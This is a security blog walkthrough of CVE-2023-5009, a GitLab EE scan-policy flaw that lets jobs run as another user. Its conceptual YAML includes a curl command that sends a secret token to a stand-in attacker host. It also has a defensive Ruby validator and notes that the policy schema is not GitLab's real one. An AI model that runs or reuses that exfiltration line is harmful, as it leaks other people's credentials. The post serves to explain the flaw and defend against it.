CVE-2023-5009 - Breaking Down the GitLab EE Security Policy Bypass (with Exploit Walkthrough)
Published: 2024-06-20
*by SecurityResearcherJoe*
## What is CVE-2023-5009?
CVE-2023-5009 is a critical vulnerability discovered in GitLab Enterprise Edition (EE) that lets attackers run pipeline jobs as any arbitrary user by abusing scheduled security scan policies. This issue affects the following versions:
- From 16.3 up to, but not including, 16.3.4
This vulnerability is particularly dangerous because it bypasses earlier attempted fixes for CVE-2023-3932 — highlighting how defense-in-depth sometimes falls flat in practice.
## What Actually Happened
GitLab lets you define scan execution policies that schedule security scans on your projects. Configuring them normally requires Owner-level permissions. However, in the affected versions, an attacker could:
This allows attackers to steal secrets, move laterally, and escalate privileges.
> Why is this scary?
> Because code, secrets, tokens, and production creds are all at stake–pipeline jobs often have high privileges!
## The Logic Flaw
The GitLab code responsible for *scheduled security scan policies* didn't properly check the user context under which jobs were being run. A clever attacker could *impersonate arbitrary users* just by manipulating policy schedule configurations.
Let's look at a simplified, conceptual example:
```yaml
# scan-policy.yml
scan_execution_policy:
  name: "weekly-secrets-scan"
  description: "Run as a specific user, but attacker can modify"
  enabled: true
  schedule:
    active: true
    cadence: "0 2 * * *"     # daily at 02:00 (a cron expression needs all 5 fields)
    user: "victim_username"  # <--- Attacker injects their victim here!
  actions:
    - scan:
        scan: secret_detection
```
> 📌 Notice: “user” is user-controlled in some configs. If checks are missing, an attacker could specify *any* username.
Let's walk through a hypothetical exploit scenario:
#### 1. Attacker Has Project Owner/Maintainer on a Repo
Say Alice and Bob are on the same GitLab instance. Alice is a threat actor.
#### 2. Alice Crafts a Security Scan Execution Policy
Alice crafts a security scan execution policy like this:
```yaml
scan_execution_policy:
  name: "malicious-backdoor"
  description: "Malicious scan running as Bob"
  enabled: true
  schedule:
    active: true
    cadence: "*/5 * * * *"
    user: "bob"  # <--- Choosing Bob to run the scan
  actions:
    - scan:
        scan: secret_detection
        script: "curl https://attacker-site/log?token=$(cat /run/secrets/api-token)"
```
#### 3. Pipeline Executes as Bob, Not Alice
The GitLab runner schedules the scan, but instead of using Alice's context, it impersonates Bob and pulls his tokens and secrets into the attacker's control.
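To make the missing check concrete from the defender's side, here is an added example (not GitLab's own code): the identity a scheduled scan runs as is derived from the trusted policy author that the caller supplies, a policy-supplied `user` is rejected whenever it disagrees, the author's role and the cron cadence are validated, and unexpected action keys such as `script` fail validation. The `user` and `script` keys follow the page's conceptual YAML rather than GitLab's real schema, and the allowlists, member table and sample policies are constructed assumptions.

```ruby
require 'yaml'
class PolicyRejected < StandardError; end

# Assumed allowlists (not GitLab's actual schema): keys an action may carry, and scan types.
ALLOWED_ACTION_KEYS = %w[scan tags variables].freeze
ALLOWED_SCANS = %w[secret_detection sast dast dependency_scanning container_scanning].freeze

# Constructed policies: the first is well formed; the second mimics the page's
# impersonation attempt (schedule.user names someone other than the author).
GOOD_POLICY = <<~YAML
  scan_execution_policy:
    name: "weekly-secrets-scan"
    enabled: true
    schedule: { active: true, cadence: "0 2 * * *" }
    actions:
      - scan: secret_detection
YAML
IMPERSONATING_POLICY = <<~YAML
  scan_execution_policy:
    name: "malicious-backdoor"
    enabled: true
    schedule: { active: true, cadence: "*/5 * * * *", user: "bob" }
    actions:
      - scan: secret_detection
        script: "not-a-policy-key"
YAML
# Constructed membership table: login => role in the project.
PROJECT_MEMBERS = { 'alice' => 'maintainer', 'bob' => 'developer' }.freeze

# Returns the login the scheduled job must run as. The identity comes from
# policy_author (the trusted committer GitLab recorded, supplied by the caller),
# never from the YAML; a conflicting schedule.user is a hard rejection.
def resolve_run_as_user(policy_yaml, policy_author:, members: PROJECT_MEMBERS)
  policy = YAML.safe_load(policy_yaml).fetch('scan_execution_policy')
  schedule = policy.fetch('schedule', {})
  requested = schedule['user']
  if requested && requested != policy_author
    raise PolicyRejected, "schedule.user=#{requested} is not the policy author #{policy_author}"
  end
  raise PolicyRejected, "#{policy_author} may not schedule scans" unless %w[owner maintainer].include?(members[policy_author])
  raise PolicyRejected, 'cadence must be a 5-field cron expression' unless schedule['cadence'].to_s.split.size == 5
  policy.fetch('actions', []).each do |action|
    extra = action.keys - ALLOWED_ACTION_KEYS
    raise PolicyRejected, "unsupported action keys: #{extra.join(', ')}" unless extra.empty?
    raise PolicyRejected, "unknown scan #{action['scan']}" unless ALLOWED_SCANS.include?(action['scan'])
  end
  policy_author
end
```

Running `resolve_run_as_user(GOOD_POLICY, policy_author: 'alice')` returns `alice`, while the impersonating policy is rejected whether Alice submits it (user mismatch) or Bob does (insufficient role).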
## Links & References
- Official GitLab Advisory for CVE-2023-5009
- Vulners: CVE-2023-5009
- Previous related CVE-2023-3932
- NVD Entry: CVE-2023-5009
Fixed in: 16.3.4
> 🛑 If you're running an affected version, upgrade immediately.
> Do NOT delay, as this is easily abused and PoCs are trivial to re-create.
## Final Takeaway
CVE-2023-5009 is a wake-up call about the importance of validating user-supplied parameters in automation systems like CI/CD. Just because you fixed one bug (*CVE-2023-3932*) doesn’t mean there aren’t others lurking nearby.
— SecurityResearcherJoe
*Original, exclusive content for your security awareness. Share and help spread the word about CVE-2023-5009.*
## Timeline
Published on: 09/19/2023 08:16:00 UTC
Last modified on: 09/21/2023 18:44:00 UTC